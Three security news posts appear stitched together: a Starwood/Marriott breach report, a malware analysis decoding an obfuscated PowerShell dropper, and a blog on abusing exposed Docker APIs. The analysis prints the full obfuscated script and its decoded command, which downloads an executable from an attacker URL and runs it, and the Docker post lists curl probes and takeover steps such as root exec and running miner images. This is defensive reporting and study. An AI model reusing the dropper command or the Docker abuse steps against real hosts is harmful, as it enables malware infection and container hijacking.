According to the company, the hackers had access to Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8, when a monitoring system flagged an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, the investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed the personal information of nearly 327 million guests; the compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, gender, arrival and departure information and reservation dates.

Starwood Data Breach

The investigation into the Starwood data breach revealed that the stolen data also includes financial data: payment card numbers and expiration dates were exposed, although in encrypted form.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).” continues the data breach notification.

“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

According to Marriott, hackers did not access the Marriott network.

The company reported the incident to law enforcement and data protection authorities, and it is notifying potentially impacted customers.

Under the EU General Data Protection Regulation (GDPR), Marriott could face a maximum fine of 20 million euros or 4 percent of its annual global revenue if data protection authorities

Pierluigi Paganini

(Security Affairs – Starwood Data Breach, Marriot)

The post 327 million Marriott guests affected in Starwood Data Breach appeared first on Security Affairs.

Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

A few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign targeting several Italian users. The attack wave used some interesting techniques that deserve a closer look, especially the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded in the zip archives delivered to the victims and found an inner PowerShell payload designed to download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and previously unseen way.

Technical Analysis

The PowerShell code executed by the initial VBS script appears as follows:

  ( '.....'|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${'} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${"[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${"@} ="[" +"$(@{ } ) "[${ *-} ] + "$(@{})"[ "${/.}" +"${#~=}" ]+ "$(@{ })"["${*~}"+"${@}"]+"$? "[${/.} ]+"]" }{${#/~} = "".("$( @{} )"[ "${/.}${)@}" ]+"$(@{ }) "["${/.}${;}"] + "$( @{ } ) "[ ${@}]+ "$(@{} ) "[ ${)@}]+ "$?"[${/.}] + "$( @{ } ) "[${$./} ])}{${#/~} ="$( @{} ) "[ "${/.}${)@}"] + "$( @{ } )"[${)@}] +"${#/~}"[ "${*~}${ *-}"]} ); .${#/~} ("${#/~} (${"@}${/.}${@}${'} + ${"@}${/.}${@}${*~} +${"@}${)@}${@}+ ${"@}${$./}${;}+${"@}${/.}${@}${)@} +${"@}${/.}${/.}${/.} +${"@}${/.}${/.}${'}+ ${"@}${/.}${/.}${;} +${"@}${)@}${;}+${"@}${/.}${/.}${"[+}+${"@}${/.}${@}${/.}+${"@}${/.}${/.}${)@}+${"@}${/.}${/.}${'}+${"@}${/.}${@}${'}+${"@}${/.}${/.}${/.}+ ${"@}${/.}${/.}${@}+${"@}${)@}${;}+ ${"@}${/.}${@}${#~=} + ${"@}${#~=}${ *-}+ ${"@}${/.}${@}${;}+ ${"@}${/.}${/.}${/.} +${"@}${/.}${/.}${)@}+ ${"@}${$./}${*~}+${"@}${)@}${'}+ ${"@}${/.}${@}${"[+} + ${"@}${/.}${/.}${;}+ ${"@}${$./}${*~} +${"@}${'}${/.} + ${"@}${)@}${/.}+ ${"@}${/.}${*~}${$./} + ${"@}${ *-}${$./}+ ${"@}${/.}${@}${#~=}+ ${"@}${/.}${/.}${*~}+ ${"@}${/.}${/.}${/.} + ${"@}${/.}${/.}${)@}+${"@}${/.}${/.}${;}+ ${"@}${)@}${'}+${"@}${ *-}${ *-}+ ${"@}${/.}${/.}${/.}+${"@}${/.}${@}${@}+ ${"@}${/.}${/.}${ *-}+${"@}${/.}${@}${"[+} +${"@}${/.}${@}${/.}+${"@}${$./}${*~} +${"@}${;}${;}+${"@}${/.}${@}${'}+ ${"@}${/.}${/.}${;}+${"@}${/.}${/.}${'}+${"@}${"[+}${)@} +${"@}${/.}${/.}${)@}+ ${"@}${#~=}${ *-} +${"@}${/.}${/.}${@}+${"@}${/.}${/.}${'}+ ${"@}${/.}${@}${*~} + ${"@}${/.}${@}${/.} +${"@}${/.}${/.}${)@} + ${"@}${/.}${*~}${'}+${"@}${$./}${*~} +${"@}${"[+}${$./} + ${"@}${/.}${/.}${;} + ${"@}${#~=}${ *-}+ ${"@}${/.}${/.}${)@} +${"@}${/.}${/.}${;} + ${"@}${)@}${'} + ${"@}${;}${;} + 
  ${"@}${/.}${@}${'}+${"@}${/.}${/.}${;} + ${"@}${/.}${/.}${'}+${"@}${"[+}${)@} +${"@}${/.}${/.}${)@} +${"@}${#~=}${ *-} +${"@}${/.}${/.}${@}+ ${"@}${/.}${/.}${'}+${"@}${/.}${@}${*~} +${"@}${/.}${@}${/.} + ${"@}${/.}${/.}${)@} + ${"@}${$./}${*~}+${"@}${)@}${'}+ ${"@}${"[+}${$./}+ ${"@}${/.}${/.}${/.}+ ${"@}${/.}${/.}${ *-} + ${"@}${/.}${/.}${)@}+ ${"@}${#~=}${#~=}+${"@}${/.}${@}${/.} + ${"@}${$./}${*~}+ ${"@}${/.}${@}${)@}+ ${"@}${/.}${/.}${;}+ ${"@}${/.}${/.}${;} + ${"@}${/.}${/.}${*~} +${"@}${/.}${/.}${'}+${"@}${'}${"[+}+ ${"@}${)@}${ *-}+${"@}${)@}${ *-}+${"@}${/.}${/.}${*~} +${"@}${/.}${/.}${)@} + ${"@}${/.}${@}${/.} + ${"@}${/.}${@}${@} + ${"@}${/.}${@}${'}+${"@}${/.}${/.}${'}+ ${"@}${/.}${/.}${*~} +${"@}${/.}${/.}${/.} + ${"@}${/.}${/.}${'}+ ${"@}${/.}${/.}${;}+ ${"@}${/.}${/.}${/.} + ${"@}${)@}${;}+${"@}${/.}${@}${#~=}+ ${"@}${#~=}${ *-}+${"@}${/.}${/.}${;} +${"@}${/.}${/.}${;} +${"@}${/.}${/.}${*~}+ ${"@}${/.}${/.}${/.} + ${"@}${/.}${@}${@}+${"@}${/.}${/.}${'}+ ${"@}${#~=}${#~=}+ ${"@}${/.}${@}${)@}+ ${"@}${/.}${/.}${#~=} + ${"@}${/.}${@}${/.}+ ${"@}${/.}${@}${'} +${"@}${/.}${/.}${;} + ${"@}${)@}${;}+ ${"@}${#~=}${#~=} + ${"@}${/.}${/.}${/.} + ${"@}${/.}${@}${#~=}+ ${"@}${)@}${ *-} + ${"@}${#~=}${#~=}+ ${"@}${/.}${/.}${/.}+${"@}${/.}${@}${#~=} +${"@}${/.}${/.}${ *-}+ ${"@}${/.}${/.}${@}+${"@}${/.}${@}${'} + ${"@}${/.}${/.}${"[+} + ${"@}${)@}${ *-}+${"@}${/.}${@}${'}+ ${"@}${/.}${/.}${@} + ${"@}${/.}${/.}${;}+${"@}${/.}${@}${/.}+ ${"@}${/.}${/.}${)@}+${"@}${)@}${;} + ${"@}${/.}${/.}${*~}+ ${"@}${/.}${@}${)@} +${"@}${/.}${/.}${*~} + ${"@}${'}${'} +${"@}${$./}${*~}+${"@}${)@}${'}+${"@}${;}${"[+}+ ${"@}${/.}${@}${/.} +${"@}${/.}${/.}${'} +${"@}${/.}${/.}${;}+${"@}${/.}${@}${'}+ ${"@}${/.}${/.}${@}+ ${"@}${#~=}${ *-}+ ${"@}${/.}${/.}${;}+${"@}${/.}${@}${'}+${"@}${/.}${/.}${/.} + ${"@}${/.}${/.}${@} +${"@}${$./}${*~} + ${"@}${$./}${;} + ${"@}${/.}${@}${/.} +${"@}${/.}${/.}${@}+ ${"@}${/.}${/.}${"[+} + ${"@}${'}${"[+} + ${"@}${/.}${/.}${;} +${"@}${/.}${@}${/.}+ 
  ${"@}${/.}${@}${#~=}+ ${"@}${/.}${/.}${*~} + ${"@}${#~=}${*~}+${"@}${/.}${@}${ *-}+ ${"@}${/.}${/.}${'} + ${"@}${/.}${@}${;} +${"@}${/.}${*~}${@}+ ${"@}${/.}${@}${;} +${"@}${/.}${@}${/.}+${"@}${/.}${/.}${#~=}+ ${"@}${/.}${/.}${ *-}+ ${"@}${/.}${@}${)@} + ${"@}${/.}${/.}${ *-}+ ${"@}${/.}${@}${ *-}+${"@}${/.}${@}${/.} +${"@}${/.}${/.}${#~=}+ ${"@}${)@}${;}+${"@}${/.}${@}${/.} +${"@}${/.}${*~}${@}+${"@}${/.}${@}${/.} + ${"@}${'}${#~=}+ ${"@}${$./}${*~}+ ${"@}${"[+}${$./} + ${"@}${/.}${/.}${;}+${"@}${#~=}${ *-}+ ${"@}${/.}${/.}${)@} +${"@}${/.}${/.}${;} + ${"@}${)@}${'} +${"@}${"[+}${@}+${"@}${/.}${/.}${)@} +${"@}${/.}${/.}${/.}+ ${"@}${#~=}${#~=}+ ${"@}${/.}${@}${/.} + ${"@}${/.}${/.}${'} +${"@}${/.}${/.}${'} +${"@}${$./}${*~} +${"@}${$./}${;} +${"@}${/.}${@}${/.}+${"@}${/.}${/.}${@}+ ${"@}${/.}${/.}${"[+} +${"@}${'}${"[+} + ${"@}${/.}${/.}${;} + ${"@}${/.}${@}${/.} +${"@}${/.}${@}${#~=} + ${"@}${/.}${/.}${*~} + ${"@}${#~=}${*~}+ ${"@}${/.}${@}${ *-}+ ${"@}${/.}${/.}${'} + ${"@}${/.}${@}${;}+${"@}${/.}${*~}${@}+${"@}${/.}${@}${;} +${"@}${/.}${@}${/.} +${"@}${/.}${/.}${#~=} +${"@}${/.}${/.}${ *-}+ ${"@}${/.}${@}${)@}+ ${"@}${/.}${/.}${ *-} +${"@}${/.}${@}${ *-} + ${"@}${/.}${@}${/.} + ${"@}${/.}${/.}${#~=}+${"@}${)@}${;} +${"@}${/.}${@}${/.} + ${"@}${/.}${*~}${@} + ${"@}${/.}${@}${/.} )")

It looks like a set of random special characters without any meaning; however, the PowerShell interpreter executes it without complaint. A closer look reveals a pattern in the odd characters that follow the “$” symbol: PowerShell lets you declare a variable as ${variable_name}, and any character is allowed between the braces, special characters included. For instance, some of the variable names in the script above are:

  • ${#/~}
  • ${@}
  • ${;}
  • ${"@}
  • ${#~=}
  • ${/.}
  • ${*~}

Replacing these variable names with more readable, meaningful names makes the script easier to analyze:

  ( '.....'|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 ="[" +"$(@{ } ) "[$var9 ] + "$(@{})"[ "$var3" +"$var11" ]+ "$(@{ })"["$var4"+"$var2"]+"$? "[$var3 ]+"]" }{$var1 = "".("$( @{} )"[ "$var3$var6" ]+"$(@{ }) "["$var3$var8"] + "$( @{ } ) "[ $var2]+ "$(@{} ) "[ $var6]+ "$?"[$var3] + "$( @{ } ) "[$var5 ])}{$var1 ="$( @{} ) "[ "$var3$var6"] + "$( @{ } )"[$var6] +"$var1"[ "$var4$var9"]} );
  .$var1 ("$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ 
$var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 
+$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After this instruction has executed, the variables hold the following values:

  $var1 = “iex”
  $var2 = “0”
  $var3 = “1”
  $var4 = “2”
  $var5 = “3”
  $var6 = “4”
  $var7 = “5”
  $var8 = “6”
  $var9 = “7”
  $var10 = “8”
  $var11 = “9”
  $var12 = “[CHar]”

The second piece of code concatenates the above values in order to compose a PowerShell command string. Each character of the generated command is represented as an ASCII decimal number, using the variables above as the alphabet (e.g. “$var12$var3$var2$var7” becomes “[CHar]105”). Decoding the entire instruction results in:

  1. iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 
+ [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII-to-char conversion makes it possible to decode and recover the final PowerShell command, unveiling the code’s purpose. It imports the BitsTransfer module (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.

  if($host.version.major -lt 3){
    Import-Module BitsTransfer
  }
  Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
  Start-Process $env:temp\ksjxjewuhukew.exe
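The two decoding stages described above can be reproduced in a few lines of Python, as an added example that is not part of the original analysis: the first pass expands the $varN tokens using the table recovered from the first instruction, the second extracts the [CHar]N codes and maps them back to text, and a small triage step lists which cmdlets the recovered command invokes. The obfuscated sample embedded in the code is constructed for this example and decodes to the harmless command Get-Date, not to the downloader analysed above; the list of cmdlet names to flag is my own choice.

```python
import re

# Variable-to-string table recovered above from the first instruction of the script.
VAR_TABLE = {
    "var1": "iex", "var2": "0", "var3": "1", "var4": "2", "var5": "3", "var6": "4",
    "var7": "5", "var8": "6", "var9": "7", "var10": "8", "var11": "9", "var12": "[CHar]",
}

# Longest names first so that "$var12" is never read as "$var1" followed by a literal "2"
# (PowerShell itself takes the longest variable name when expanding a string).
_VAR_RE = re.compile(r"\$(" + "|".join(sorted(VAR_TABLE, key=len, reverse=True)) + r")")
_CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)

# Cmdlets and aliases worth flagging in the recovered text (my own triage list).
SUSPICIOUS = ("iex", "Invoke-Expression", "Start-BitsTransfer", "Start-Process",
              "DownloadString", "DownloadFile")


def substitute_vars(script: str) -> str:
    """Stage 1: expand every $varN token into the string it holds."""
    return _VAR_RE.sub(lambda m: VAR_TABLE[m.group(1)], script)


def decode_char_sum(expr: str) -> str:
    """Stage 2: turn a '[CHar]N + [CHar]M + ...' sum into the text it builds."""
    return "".join(chr(int(code)) for code in _CHAR_RE.findall(expr))


def triage(text: str) -> list:
    """Return the suspicious cmdlet names present in the given text."""
    lowered = text.lower()
    return [name for name in SUSPICIOUS if name.lower() in lowered]


def deobfuscate(script: str) -> dict:
    """Run both stages and report what the recovered command invokes."""
    stage1 = substitute_vars(script)
    stage2 = decode_char_sum(stage1)
    return {"stage1": stage1, "stage2": stage2, "indicators": triage(stage1 + " " + stage2)}


# Constructed sample in the same shape as the analysed script; it decodes to the
# harmless command "Get-Date" rather than to the downloader discussed above.
SAMPLE = ('.$var1 ("$var1 ($var12$var9$var3 + $var12$var3$var2$var3+$var12$var3$var3$var8 '
          '+$var12$var6$var7+ $var12$var8$var10+$var12$var11$var9+$var12$var3$var3$var8'
          '+$var12$var3$var2$var3)")')

if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    print("stage 1:", result["stage1"])
    print("stage 2:", result["stage2"])
    print("indicators:", result["indicators"])
```

The wrapper `.$var1 (...)` survives stage 1 as `.iex (...)`, which is why the triage step looks at both stages: the `iex` invocation is itself a useful indicator even when the inner command is benign.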

 

Conclusion

The initial script, at first impression, seems obfuscated using sophisticated techniques. However, analyzing its actual code shows how the clever use of simple tricks, such as variable replacement or decimal encoding, is able to hide a clearly malicious PowerShell script, making it nearly undetectable by common anti-malware engines.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

Dissecting the Mindscrew-Powershell Obfuscation

Pierluigi Paganini

(Security Affairs – Powershell , VBScript)

The post Dissecting the Mindscrew-Powershell Obfuscation appeared first on Security Affairs.

Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

The IT industry has seen quite a few transformations in the last couple of decades with the advent of disruptive technologies. Back in 2000, every aspiring student wanted to become a computer/IT engineer, thanks to the “.com” boom that was storming the IT industry in those days. A few years later, the IT industry was disrupted again with the dawn of virtualization.

The inception of cloud technologies in the last few years has completely changed the way we perceive and manage IT. Who would have thought 20 years ago that all of the IT infrastructure could be generated by just a few lines of code?

More recently, the rise of DevOps, backed by these disruptive advancements, is once again redefining the way the IT industry works. Today, every organization is keen to embrace this digital transformation journey and to leverage the benefits of DevOps by adopting it. DevOps practices offer the capability of rapidly delivering products by reforming and automating the CI/CD pipeline; they make deployment far more efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation, and we are all part of this journey. At the same time, the cyber security industry is moving very quickly to keep pace with these technology disruptions: the ways and means of delivering effective cyber security have gone through radical changes in the last 6-7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given birth to DevSecOps to ensure security in the CI/CD pipeline.

The use of containers has become prevalent with the rise of the DevOps era. Containers are dynamic and ephemeral by nature; anything ephemeral is hard to get visibility on, and what is not visible is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security, and there are commercial and open-source solutions on the market to handle these newborn challenges.

In this article, I am exploring the abuse of the open API of Docker containers. Docker is a popular container product which has been adopted widely by the community, and it has both community and enterprise editions. Docker comes with quite a few security features; however, misconfiguration by the admins/users of Docker hosts may leave them vulnerable and open to exploitation.

Need of an API

By default, when Docker is installed, the API is not exposed to the outside world; it is only accessible locally, through the loopback interface. Exposing the API may be required to leverage applications like Portainer, which is used to manage containers on that host or on remote hosts.

How to open API in Docker for CentOS?

Opening the API may get slightly tricky depending on the operating system you are using. Please follow these steps to open the API on CentOS 7, provided that the Docker engine is already installed.

Update the file /etc/systemd/system/docker.service.d/docker.conf with the following content:

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

Note: If directory or file is missing under /etc/systemd/system then create it manually.


Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify that the configuration is working as expected by running:

ps -ef | grep docker

How to connect to open API?

The following command is used to hook into the open API on the remote host. Just by nudging the API with a standard curl command you will get the information shown in the screenshot (2375 is the plaintext API port; 2376 is the port used when TLS is configured):

curl -s <remote_ip>:2375 | jq

What can(not) we do with Open API?

Once we reach the open API on a remote Docker host, all the docker commands can be run against that host. Using Docker commands, all sorts of Docker operations and management can be performed on the remote host, ranging from information gathering about the Docker host to pulling a cryptominer image and running it as a rogue container.

I have created a demo set-up to demonstrate a few of these examples.

I have exposed the API on one of the CentOS boxes (10.113.12.119) following the steps in the section above. I will connect to this machine through this open API on port 2375 (Docker).

The screenshots show the following operations against the remote host:

  • Information gathering about the Docker host
  • List the images stored on the machine
  • List all containers on the machine
  • Run/launch a container on the remote machine, spawning a shell via the exec command
  • List running containers on the machine
  • Run any command with root privilege in any of the running containers
  • Pull any image from the public repository and run it as a container on the remote host

Open Docker API on the Internet

If you search the Shodan search engine for open APIs, you find that more than 1000 hosts have their Docker API exposed on the Internet.

I have pulled down a sample of approximately 500 hosts using the Shodan API and done some analytics on these 500 hosts to understand the spread pattern of these open APIs.

Looking at the chart above, China and the United States account for the largest numbers of open Docker APIs.

The largest share of the Docker Engines among the ~500 analyzed open APIs run version 18.06.1-ce.

Even where SSL/TLS is enabled, a small portion of the Docker APIs were still supporting vulnerable and outdated protocols like SSLv2 and SSLv3.

Are they already compromised?

